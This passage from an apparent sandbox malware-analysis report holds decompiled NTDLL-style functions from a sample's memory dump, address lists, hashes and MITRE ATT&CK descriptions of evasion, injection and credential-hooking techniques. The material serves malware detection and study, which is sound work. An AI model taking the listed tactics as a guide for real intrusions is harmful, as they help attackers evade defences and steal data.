					L34E54A09(_t377,  &_v44, 0);
					goto L8;
				}
				_t339 =  *((intOrPtr*)(_t377 + 0x24));
				_v388 = _t339;
				_push(_t339);
				_t340 = E34E929A0();
				_v276 = _t340;
				if(_t340 < 0) {
					goto L73;
				}
				asm("lock inc dword [edi]");
				_v246 = 1;
				goto L5;
			}

0x34e558e0
0x34e558e0
0x34e558e0
0x34e558e5
0x34e558e7
0x34e558ec
0x34e558f7
0x34e558f8
0x34e558fe
0x34e55903
0x34e55906
0x34e55908
0x34e5590b
0x34e5590c
0x34e5590d
0x34e5590e
0x34e55912
0x34e55918
0x34e5591b
0x34e5591e
0x34e55928
0x34e5592e
0x34e55935
0x34e5593c
0x34e55943
0x34e5594a
0x34e55951
0x34e55958
0x34e5595f
0x34e55966
0x34e55970
0x34e5597a
0x34e55985
0x34e5598b
0x34e55998
0x34e5599d
0x34e559a3
0x34e559a8
0x34e559b0
0x34e559b2
0x34e559b8
0x34e559b8
0x34e559c8
0x34e559cd
0x34e559d0
0x34e559d7
0x34e559e5
0x34e559ea
0x34e559f8
0x34eb0745
0x34eb074f
0x34eb074f
0x34eb0756
0x34e55a25
0x34e55a25
0x34e55a2c
0x34e55a31
0x34e55a38
0x34e55fef
0x34e55fef
0x34e55ff6
0x34e55ffb
0x34e56002
0x34e56007
0x34e56007
0x34e56009
0x34e5600f
0x34e56017
0x34e5601c
0x34e5601c
0x34e55b95
0x34e55b99
0x34e55f2d
0x34e55f32
0x34e55f36
0x34e55f36
0x34e55ba1
0x34e55fcf
0x34e55fcf
0x34e55fd4
0x00000000
0x00000000
0x34e55fd6
0x34e55fd6
0x34e55fd9
0x34eb07dc
0x34eb07e3
0x34eb07e5
0x34eb07ea
0x00000000
0x34eb07ea
0x34e55fdf
0x34e55fe2
0x00000000
0x00000000
0x34e55fe8
0x00000000
0x34e55ba7
0x34e55ba9
0x34e55e71
0x34e55e77
0x34e55e79
0x34e55bb4
0x34e55bba
0x34eb0836
0x34eb083a
0x34eb0841
0x34eb0847
0x34eb0847
0x34e55bd4
0x34e55bda
0x34e55be0
0x34e55be7
0x00000000
0x34e55bed
0x34e55bf3
0x34e55ae0
0x34e55ae0
0x34e55aec
0x34e55aef
0x34e55af2
0x34e55af5
0x34e55af8
0x34e55afb
0x34e55b07
0x34e55f69
0x34e55f73
0x34e55f8b
0x34e55f90
0x34e55f92
0x34eb077f
0x34eb077f
0x34eb0789
0x34e55b43
0x34e55b43
0x34e55b49
0x34e55b53
0x34e55b5a
0x34e55b5d
0x34e55b66
0x34e55b67
0x34e55b6d
0x34e55b6e
0x34e55b74
0x34e55b7a
0x34e55b7b
0x34e55b80
0x34e55b86
0x34e55b8f
0x00000000
0x00000000
0x00000000
0x34e55b8f
0x34e55f98
0x34e55f98
0x34e55f9e
0x34e55fa0
0x34e55fa7
0x34e55fae
0x34e55fb1
0x00000000
0x34e55fb1
0x34e55b13
0x00000000
0x00000000
0x34e55b19
0x34e55b30
0x34e55b35
0x34e55b3b
0x34e55b41
0x00000000
0x34e55b41
0x34e55bf9
0x34e55bfe
0x34e55e84
0x34e55e8d
0x34e55e93
0x34e55ea1
0x34e55ea9
0x34e55eb4
0x34e55eb9
0x34e55ec0
0x34e55ec6
0x34e55ec7
0x34e55ed0
0x34e55ed1
0x34e55ed2
0x34e55ed8
0x34e55f15
0x34e55d52
0x34e55d52
0x34e55d59
0x34e55d60
0x34eb0909
0x34eb0909
0x34e55d6d
0x34e55d74
0x34e55d81
0x34e55d86
0x34e55d8d
0x34e55d9e
0x34eb0955
0x34eb0958
0x34eb095e
0x34eb0960
0x34eb0963
0x34eb0969
0x34eb0969
0x34eb096f
0x34eb096f
0x34eb096f
0x34eb096f
0x34eb0971
0x34eb0977
0x34eb0979
0x34eb0989
0x34eb0992
0x34eb0998
0x34eb099c
0x34eb099e
0x34eb09a4
0x34eb09a6
0x34eb09ac
0x34eb09ac
0x34eb09b4
0x34eb09b4
0x34eb09bc
0x34eb09c6
0x34eb09ce
0x34eb09cf
0x34eb09d1
0x34eb09d4
0x34e55da4
0x34e55da4
0x34e55dac
0x34e55f0b
0x34e55f0b
0x34e55db8
0x34eb09e2
0x34eb09e9
0x34eb09ef
0x34eb09ef
0x34e55dbe
0x34e55dc1
0x34e55dc7
0x34e55dc9
0x34e55dcc
0x34e55dd2
0x34e55de0
0x34e55de0
0x34e55de2
0x34e55de8
0x34e55dea
0x34e55df0
0x34e55df3
0x34e55e00
0x00000000
0x00000000
0x34e55e08
0x34e55eec
0x34e55eef
0x34eb09f9
0x34eb0a00
0x00000000
0x00000000
0x34eb0a06
0x34e55ef7
0x34e55f00
0x34e55e29
0x34e55e29
0x34e55e2c
0x34e55e34
0x34e55e38
0x34e55e3a
0x34e55e40
0x34e55e42
0x34e55e4e
0x00000000
0x34e55e58
0x34e55e58
0x34e55e5e
0x34e55e66
0x00000000
0x00000000
0x00000000
0x34e55e6c
0x34e55e4e
0x34e55e0e
0x34e55e0e
0x34e55e21
0x34e55e23
0x00000000
0x34e55e23
0x34e55de0
0x00000000
0x34e55d9e
0x34e55eda
0x34e55ee0
0x34e55f53
0x34e55f59
0x34e5602d
0x34e56033
0x34e56035
0x00000000
0x34e56035
0x34e55f5f
0x00000000
0x34e55f5f
0x34e55ee2
0x00000000
0x34e55ee2
0x34e55c04
0x34e55c0a
0x34e55c0b
0x34e55c11
0x34e55c1a
0x00000000
0x00000000
0x34e55c24
0x34e56047
0x34e5604c
0x34e5604c
0x34e55c2a
0x34e55c30
0x34e55c3a
0x34e55c40
0x34e55c4c
0x34e55c52
0x34e55c5f
0x34e55c68
0x34e55c71
0x34e55c7a
0x34e55c7d
0x34e55c85
0x34e55c9e
0x34e55ca1
0x34e55ca7
0x34e55cad
0x34e55cba
0x34eb087c
0x34e55cc0
0x34e55cc0
0x34e55cc0
0x34e55cc4
0x34eb0886
0x34eb0889
0x34eb0889
0x34e55cd1
0x34eb0897
0x34eb0897
0x34e55cf0
0x34eb08a2
0x34eb08a2
0x34e55cf6
0x34e55cfc
0x34e55d09
0x34eb08ae
0x34eb08ae
0x34e55d0f
0x34e55d15
0x34e55d22
0x34eb08ba
0x34eb08ba
0x34e55d22
0x34e55d28
0x34e55d2f
0x34e55d37
0x34e55d39
0x34e55d40
0x34e55d47
0x34e55f41
0x34e55f47
0x34e55fc2
0x34e55fc8
0x34e55f49
0x34e55f49
0x34e55f49
0x34e55d4d
0x34e55d4d
0x34e55d4d
0x00000000
0x34e55d47
0x34e55be7
0x34e55e7f
0x34e55baf
0x00000000
0x34e55baf
0x34e55ba1
0x34e55a46
0x34e55a4b
0x34e55a52
0x34e55a5f
0x34e55a64
0x34e55a6b
0x34e55a71
0x34e55a76
0x34eb0772
0x34e56068
0x34e56073
0x34e56073
0x34e55a7c
0x34e55a82
0x34e55a88
0x34e55a8e
0x34e55a92
0x34e55a95
0x34e55a9c
0x34e55aa3
0x34e55ab6
0x34e55abb
0x34e55abe
0x34e55ac5
0x34e55ace
0x34e55ad1
0x34e55ad3
0x00000000
0x34e55ad3
0x34e559fe
0x34e55a01
0x34e55a07
0x34e55a08
0x34e55a0d
0x34e55a15
0x00000000
0x00000000
0x34e55a1b
0x34e55a1e
0x00000000

Strings

@, xrefs: 34EB08AE

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: d35215b8d392beeac4e73052cac7adaf1535f8f313f4f30ebf7cf76cba5a9c12
Instruction ID: 6401ba479c9a5c68552e78a747dc73ed0df2c016a3fe4725004c95509c1e73e9
Opcode Fuzzy Hash: d35215b8d392beeac4e73052cac7adaf1535f8f313f4f30ebf7cf76cba5a9c12
Instruction Fuzzy Hash: 4B323574E04369DFEB61CF64C844BDABBB4BF08308F0041E9D559A7261DB74AA84CF91

Uniqueness

Uniqueness Score: -1.00%

Function 34E4E67A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E34E4E67A(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr* _a8, char _a12) {
				void* _t29;
				intOrPtr _t31;
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr* _t50;
				intOrPtr _t57;
				intOrPtr _t60;
				char _t63;
				signed int _t66;
				signed int _t67;
				signed int _t71;

				_t65 = __edx;
				_t48 = __ecx;
				_t29 = 3;
				_t63 = 0;
				_t66 =  *(__ecx + 0x36) & 0x0000ffff;
				if( *__edx != _t29) {
					if( *__edx == 4) {
						_t67 = _t66 & 0x00003fff;
						if(_t67 == _t29 || _t67 == 2) {
							_t50 = _a4;
							asm("cdq");
							 *_t50 =  *((intOrPtr*)(_t48 + 0x30));
							 *((intOrPtr*)(_t50 + 4)) = _t63;
							_t31 = E34E8FF50(_t65);
							_t63 = 1;
							 *_a8 = _t31;
							_t22 =  &_a12; // 0x34e4e65e
							 *((char*)( *_t22)) = 1;
						}
						L7:
						return _t63;
					}
					if((_t66 & 0x00003fff) !=  *__edx) {
						if((_t66 & 0x00003fff) == 0xa &&  *__edx == 7 &&  *((intOrPtr*)(__edx + 0x24)) ==  *((intOrPtr*)( *[fs:0x18] + 0x20))) {
							 *0x34f491e0(__edx,  *((intOrPtr*)(__ecx + 0x20)));
							 *_a8 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c))))();
							_t28 =  &_a12; // 0x34e4e65e
							 *((char*)( *_t28)) = 1;
							L6:
							_t63 = 0;
						}
						goto L7;
					}
					asm("cdq");
					_t57 =  *((intOrPtr*)(__ecx + 0x30));
					 *((intOrPtr*)(__edx + 0x1c)) = 0;
					_t40 = _a4;
					 *((intOrPtr*)(__edx + 0x18)) = _t57;
					 *_t40 = _t57;
					 *((intOrPtr*)(_t40 + 4)) = 0;
					 *0x34f491e0(__edx,  *((intOrPtr*)(__ecx + 0x20)));
					 *_a8 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c))))();
					L5:
					_t8 =  &_a12; // 0x34e4e65e
					 *((char*)( *_t8)) = 1;
					goto L6;
				}
				_t71 = _t66 & 0x00003fff;
				if(_t71 != _t29) {
					if(_t71 == 2) {
						goto L2;
					}
					goto L7;
				}
				L2:
				if( *((intOrPtr*)(_t65 + 0x4e)) < _t63) {
					_t44 =  *0x34f441d0; // 0x4c105b8
					if(_t44 == 0) {
						goto L3;
					}
					_t17 = _t44 + 0x30; // 0x6c
					_t45 =  *_t17;
					L4:
					asm("cdq");
					_t60 = _t45;
					_t46 = _a4;
					 *_t46 = _t60;
					 *((intOrPtr*)(_t46 + 4)) = _t63;
					 *((intOrPtr*)(_t65 + 0x18)) = _t60;
					 *((intOrPtr*)(_t65 + 0x1c)) = _t63;
					E34E50D9F(_t48, _t65);
					goto L5;
				}
				L3:
				_t45 =  *((intOrPtr*)(_t48 + 0x30));
				goto L4;
			}

0x34e4e682
0x34e4e684
0x34e4e688
0x34e4e689
0x34e4e68b
0x34e4e691
0x34e4e6d5
0x34ead929
0x34ead932
0x34ead93e
0x34ead944
0x34ead946
0x34ead948
0x34ead94b
0x34ead953
0x34ead955
0x34ead957
0x34ead95a
0x34ead95a
0x34e4e6cb
0x34e4e6cf
0x34e4e6cf
0x34e4e6e6
0x34ead968
0x34ead993
0x34ead99e
0x34ead9a0
0x34ead9a3
0x34e4e6c7
0x34e4e6c7
0x34e4e6c7
0x00000000
0x34ead968
0x34e4e6ef
0x34e4e6f0
0x34e4e6f2
0x34e4e6f5
0x34e4e6f8
0x34e4e701
0x34e4e706
0x34e4e709
0x34e4e714
0x34e4e6c1
0x34e4e6c1
0x34e4e6c4
0x00000000
0x34e4e6c4
0x34e4e693
0x34e4e69c
0x34e4e71c
0x00000000
0x00000000
0x00000000
0x34e4e71e
0x34e4e69e
0x34e4e6a2
0x34e4e720
0x34e4e727
0x00000000
0x00000000
0x34e4e72d
0x34e4e72d
0x34e4e6a7
0x34e4e6a7
0x34e4e6a8
0x34e4e6aa
0x34e4e6ad
0x34e4e6af
0x34e4e6b2
0x34e4e6b7
0x34e4e6bc
0x00000000
0x34e4e6bc
0x34e4e6a4
0x34e4e6a4
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 34E4E709

Strings

^4, xrefs: 34EAD957, 34EAD9A0, 34E4E6C1

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ^4
API String ID: 3446177414-3815524709
Opcode ID: ba537ac10ba2d7f5409daa4745818330569cdfacccd56b882ba27eb706706fd6
Instruction ID: 7e020c894d2250201f5098b665d125b60ceaad919e3529376b6020de415f78ce
Opcode Fuzzy Hash: ba537ac10ba2d7f5409daa4745818330569cdfacccd56b882ba27eb706706fd6
Instruction Fuzzy Hash: 32417AB9A00201DFDB55CF2DE485955BBF6FF99754B1084AAEC08CB360DB70E891CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 34E4DF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E34E4DF21(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x34f4b370 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E34E98F40( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							L34E62330(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E34E624D0(_t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x34f491e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return L34E94B50(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x34e4df21
0x34e4df29
0x34e4df33
0x34e4df3b
0x34e4df40
0x34e4df44
0x34e4df46
0x34e4df52
0x34e4df56
0x34e4df5b
0x34e4df5e
0x34e4df61
0x34e4df65
0x34e4df67
0x34e4e058
0x34e4e05a
0x34e4e05d
0x00000000
0x34e4df6d
0x34e4df6d
0x34e4df70
0x34ead6ea
0x34ead6f3
0x00000000
0x34ead6ec
0x34ead6ec
0x34ead6ec
0x34e4df76
0x34e4df76
0x34e4df78
0x34e4df78
0x34e4df79
0x34e4df80
0x34e4e019
0x34e4e024
0x34e4e02c
0x34e4e032
0x34e4e03b
0x34e4e045
0x34e4e04b
0x34e4e04e
0x34e4e04e
0x34e4df8d
0x34e4df91
0x34e4df94
0x34e4df99
0x34e4dfa0
0x34e4dfab
0x34e4dfb3
0x34e4dfb7
0x34e4dfbb
0x34e4dfbc
0x34e4dfc0
0x34e4dfc8
0x34e4dfc9
0x34e4dfca
0x34e4dfcd
0x34e4dfe0
0x34e4dfea
0x34e4dfea
0x34e4dfec
0x34e4dfec
0x34e4df70
0x34e4dff2
0x34e4dff3
0x34e4dff4
0x34e4dfff

APIs

RtlDebugPrintTimes.NTDLL ref: 34E4DFE0

Strings

0, xrefs: 34E4DFC0
0, xrefs: 34E4DFAB

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 76fc92b5633c699e1d5e4cdc744b5681d36b27b170cd8459862814451f66905c
Instruction ID: a4405381c0a5b9a48b92ebfda375282dde69e1326075f3d10f6468ffa9ace5c1
Opcode Fuzzy Hash: 76fc92b5633c699e1d5e4cdc744b5681d36b27b170cd8459862814451f66905c
Instruction Fuzzy Hash: 93418CB1A087019FD310CF68D444E5ABBE9FB88358F054A2EF888DB340D771EA05CB96

Uniqueness

Uniqueness Score: -1.00%

Function 34E4E880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
timeCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E34E4E880(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t38;
				intOrPtr _t39;
				intOrPtr* _t42;
				intOrPtr _t49;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t56;

				_push(0x28);
				E34EA7C40(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t54 - 0x30)) =  *((intOrPtr*)(_t54 + 8));
				 *((intOrPtr*)(_t54 - 0x24)) =  *((intOrPtr*)(_t54 + 0xc));
				 *((intOrPtr*)(_t54 - 0x20)) =  *((intOrPtr*)(_t54 + 0x10));
				_t42 =  *((intOrPtr*)(_t54 + 0x14));
				 *((intOrPtr*)(_t54 - 0x34)) =  *((intOrPtr*)(_t54 + 0x18));
				_t49 =  *((intOrPtr*)(_t54 + 0x1c));
				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
				E34E96510(0x1000, 0x34f2bb58);
				 *((intOrPtr*)(_t54 - 0x18)) = _t56;
				_t52 = _t56;
				 *((intOrPtr*)(_t54 - 0x38)) = _t52;
				 *(_t54 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t54 - 0x28)) = 0x1000;
				_push(_t54 - 0x28);
				_push(_t52);
				_t18 = _t54 - 0x2c; // 0x34e4e920
				_push(0);
				_push(_t49);
				_push(_t54 - 0x24);
				_t38 = E34E93FE0();
				if(_t38 >= 0) {
					_t20 = _t54 - 0x2c; // 0x34e4e920
					_t39 =  *_t20;
					 *((intOrPtr*)( *((intOrPtr*)(_t54 - 0x30)))) = _t39;
					_t23 = _t54 - 0x34; // 0x34e4e96d
					 *0x34f491e0( *((intOrPtr*)(_t54 - 0x24)),  *((intOrPtr*)(_t54 - 0x20)), _t39, _t49,  *_t23, _t52,  *((intOrPtr*)(_t54 - 0x28)));
					_t38 =  *_t42();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0x10));
				return _t38;
			}

0x34e4e880
0x34e4e887
0x34e4e88f
0x34e4e895
0x34e4e89b
0x34e4e89e
0x34e4e8a4
0x34e4e8a7
0x34e4e8aa
0x34e4e8b3
0x34e4e8b8
0x34e4e8bb
0x34e4e8bd
0x34e4e8c0
0x34e4e8c7
0x34e4e8d1
0x34e4e8d2
0x34e4e8d3
0x34e4e8d7
0x34e4e8d9
0x34e4e8dd
0x34e4e8de
0x34e4e8e5
0x34e4e8e7
0x34e4e8e7
0x34e4e8ed
0x34e4e8f3
0x34e4e900
0x34e4e906
0x34e4e906
0x34e4e90e
0x34e4e91a

APIs

RtlDebugPrintTimes.NTDLL ref: 34E4E900

Strings

4, xrefs: 34E4E8D3, 34E4E8E7, 34E4E8D6, 34E4E8F7
m4, xrefs: 34E4E8F3

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 4$m4
API String ID: 3446177414-1835557350
Opcode ID: 0365d6a34f8f80af9abda5a55b0c7caf15c6e6361b0520a9da0889360458792c
Instruction ID: f8e4231d3600fc29c09b8c1558dba097ec7fa839352fa315dd57c62b05d076de
Opcode Fuzzy Hash: 0365d6a34f8f80af9abda5a55b0c7caf15c6e6361b0520a9da0889360458792c
Instruction Fuzzy Hash: 2A11B3B6A11208AFDF11CF98D885ADEBBB5EB4C360F14405AE911B7240D735AA54CBA0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
